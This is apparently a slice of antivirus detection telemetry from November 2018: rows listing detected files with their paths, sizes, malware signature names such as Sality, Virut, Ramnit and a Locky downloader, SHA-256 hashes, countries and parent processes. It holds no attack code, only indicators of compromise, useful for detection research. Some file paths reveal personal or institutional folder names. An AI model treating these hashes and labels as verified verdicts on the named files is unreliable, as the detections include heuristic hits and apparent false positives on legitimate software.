  Row(detection=Row(filename='adobeairinstaller.exe', filepath='D:\\pindahan\\download\\Programs\\AdobeAIRInstaller.exe', filesize=18412000, name='W32/Sality.AT.#M1.#R1'), hash='abacdc4bf75adeac6ff18b6766f0db093f054719ce425ac0b239b024a784df75', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:12:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fer.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ELETTRICO\\FER.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='juiupnqg.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\jUiuPNQG.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='khccfdjdl.dll', filepath='\\\\?\\C:\\Program Files\\FrwbVTWcJIE\\kHCcfDJdl.dll', filesize=576000, name='HEUR/AGEN.1030619.#M1.#R1'), hash='b8a61b846be3accaab635867d7eb1629b9d193971904b6d5ce83131d31f361bb', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:44:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-203221-0e428dfa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203221-0E428DFA', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:32:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205634-46b222a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42215363\\AVSCAN-20181104-205547-43178310\\AVSCAN-20181104-205634-46B222A3', filesize=2432000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='1edf4fd8ea5c3d777994ffd006b236bdf65d60afd0c44f0c88c7aefac328f9f1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:45:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160529-dab89d23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155558-81439129\\AVSCAN-20181104-160529-DAB89D23', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-002024-9f9e1a0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-002024-9F9E1A0E', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:50:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='z-enemy.exe', filepath='C:\\Users\\X\\Downloads\\z-enemy.1-22-cuda10.0_x32\\z-enemy.exe', filesize=13120000, name='HEUR/AGEN.1033252.#M1.#R1'), hash='2fceedab18e5468969fc4112ba2f5b78caf66cbaa0db75bf9779955a54076c32', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T08:39:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:01:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001e838', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001e838', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:18:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='coreldraw graphics suite x7 v.17.1.0.572.(incomplete).rar', filepath='\\\\?\\C:\\Users\\X\\Documents\\Usenet.nl\\Virus_X7 Graphics Suite Coreldraw Corel (2014) Build Corelcad - x86x64\\CorelDRAW Graphics Suite X7 v.17.1.0.572.(incomplete).rar', filesize=28800000, name='TR/Dropper.MSIL.Gen4.#M300.#R301027'), hash='0a7d045751f0962d5d2be52a067b23354fbb280a89bda27d04dfcab83bd4e4a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:19:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085649-3c1fe7c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6edb7a3\\AVSCAN-20181104-085620-35F26C6A\\AVSCAN-20181104-085649-3C1FE7C3', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:01:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T17:50:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0345546.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP438\\A0345546.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:25:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:25:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2624906\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Devinho Novaes - Ao Vivo em Salvador SãoJoãodoBoyzinho_0485811795.exe', parentsize=2362120, timestamp='2018-11-04T01:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212627-71ab2ddf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a9ce2c5\\AVSCAN-20181104-212516-6B15C4A4\\AVSCAN-20181104-212627-71AB2DDF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:26:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225849-2872d615', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-202113-A73A1DA0\\AVSCAN-20181104-225849-2872D615', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132200-48002352', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132200-48002352', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eulczjh.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\eulczjh.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:01:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cot1322063220354.html', filepath='C:\\ProgramData\\ATI\\ACE\\Help\\en-US\\cot1322063220354.html', filesize=208000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='9f14bddd66d2b73f45a9d71818135c175d72227d64f8b3043d6981a629539947', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1225616, timestamp='2018-11-04T08:13:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='h1z1 - installshield wizard.exe', filepath='C:\\Users\\X\\Downloads\\H1Z1 - InstallShield Wizard.exe', filesize=9856000, name='HEUR/AGEN.1008572.#M1.#R1'), hash='7b7a809f1e1ca84e19be5d3b69c7d86f15692ab6f2997189008b819bb4755e4c', metadata=Row(cmdline='--engine=2 --session-id=k7WmLg\\\\\\/TFTWwgJHaah9XNW1I57jgI8oAm3vjeGIQ --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-04T17:51:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:25:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115902-04cdedf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a982ce4\\AVSCAN-20181104-115844-01FF6954\\AVSCAN-20181104-115902-04CDEDF9', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:59:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsr430.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T14:18:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Neshta.A.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline='-k localservicenetworkrestricted -p -s wscsvc', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T15:59:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103112-1dafb29d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82c47796\\AVSCAN-20181104-102934-0C7BA5F0\\AVSCAN-20181104-103112-1DAFB29D', filesize=4448000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='1575f3c31ed0d3882399cdf5a4581893bd9797d09d6d0f0c55a9d16d2ca44c96', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:31:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130809-d49a12a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9397cb91\\AVSCAN-20181104-130553-C19C0B84\\AVSCAN-20181104-130809-D49A12A2', filesize=8000, name='JS/Dldr.Locky.BCN.#M1.#R1'), hash='c631e34853300c094c5bac5c053ce94c5f390be817cca0813fc677f1f123291d', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:08:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wsfacf1429558a55def27e5f106b5723eec-78c4.htm', filepath='e:\\packardbell yedek\\masaustusonhali\\setupsmuhendislik\\autocad 2010 32 bit\\autocad_2010_english_mld_win_32bit\\x86\\acad\\program files\\root\\common files folder\\autodesk shared\\adlm\\r1\\pl-pl\\help\\sam\\files\\WSfacf1429558a55def27e5f106b5723eec-78c4.htm', filesize=120000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='5f78f4cd824c1dd4801655422055a4f1e4daa2cd7da56b6881f30fbddba6fe17', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:30:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:03:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-235241-41e91454', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01e845b2\\AVSCAN-20181104-235229-3F40CA4F\\AVSCAN-20181104-235241-41E91454', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:53:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='afcore.dll', filepath='C:\\Program Files (x86)\\ArcGIS\\Desktop10.6\\bin\\AfCore.dll', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\arcgis eğimler 5 mde bir.mxd\\\\\\"', country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ArcGIS\\Desktop10.6\\bin\\ArcMap.exe', parentsize=2178616, timestamp='2018-11-04T10:21:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:28:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baa5d62ad4e67869cd3f251d88971f961902a01438f690b4192805a0c266af6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BAA5D62AD4E67869CD3F251D88971F961902A01438F690B4192805A0C266AF6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='baa5d62ad4e67869cd3f251d88971f961902a01438f690b4192805a0c266af6d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:57:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173111-9e96c8bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10135bc4\\AVSCAN-20181104-172847-8E9DA678\\AVSCAN-20181104-173111-9E96C8BF', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:31:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mysqlimport.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Version Cue CS4\\Server\\database-template\\bin\\x86\\mysqlimport.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='0652e2e8370571321214c4aefe78114a203dd646e79e2ec035ffe970e18673d8', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4deb0cea9115d1f2a68119a8106f6ee48d518c03', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\4deb0cea9115d1f2a68119a8106f6ee48d518c03', filesize=320000, name='Adware/DealPly.195b3f.#M1.#R1'), hash='195b3f33a2d60f82585998ed65041c2502d68605c40ace3254fc4c9080943aac', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:16:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='{79fe6fa4-b432-fd56-f439-f91c5340f8cf}-service_kms.exe', filepath='\\\\?\\C:\\Windows\\System32\\MRT\\88E3BAB3-52CF-4B15-976E-0BE4CFA98AA8\\Samples\\{B3BAE388-CF52-154B-976E-0BE4CFA98AA8}\\{79FE6FA4-B432-FD56-F439-F91C5340F8CF}-Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='d7bc6fd899d9890f6f3f7553c5b9237d8aedfb5a155764356b6d6a305f072ebb', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T10:24:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000869', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp00000869', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:52:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='medalwall.exe', filepath='\\\\?\\C:\\360SANDBOX\\SHADOW\\Program Files (x86)\\360\\Total Security\\MedalWall.exe', filesize=1468000, name='W32/Neshta.A.#M1.#R1'), hash='aa6cac1e7c9e0d89fa8f7388da4f8905a2d161e68d53c7a69ae35f174102937c', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:42:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-060938-5be6ea98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48106572\\AVSCAN-20181105-015935-A564B04D\\AVSCAN-20181105-060938-5BE6EA98', filesize=3660000, name='PUA/Widdit.Gen4.#M300.#R5744'), hash='0d45ee8ce4b621210cea7a0da2ac15ab79f40cc31f098ebe8879522c502ef598', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:09:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055349-3d054274', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055349-3D054274', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:53:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b8a0965df696458205b59efc1005088b4cc2508c68744f2d4d98a7869d875a8c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B8A0965DF696458205B59EFC1005088B4CC2508C68744F2D4D98A7869D875A8C', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='b8a0965df696458205b59efc1005088b4cc2508c68744f2d4d98a7869d875a8c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:51:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140248-f23ca917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140248-F23CA917', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:46:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ktab.exe', filepath='F:\\Program Files\\Java\\jre6\\bin\\ktab.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='72dcbd7bd6f78b03de185bb2f15b97906220b52ed8e7c1ebc87a1fe08da0b0b9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T10:50:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00026fff', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00026fff', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134528-f1377b7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35c26308\\AVSCAN-20181102-132144-35D13AB6\\AVSCAN-20181102-134528-F1377B7A', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='dba52e518a7777fc71fa48ab8c290083170b0e11c3683e84a7962f24fbdfea3c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:45:27Z'), dt=datetime.date(2018, 11, 2)),
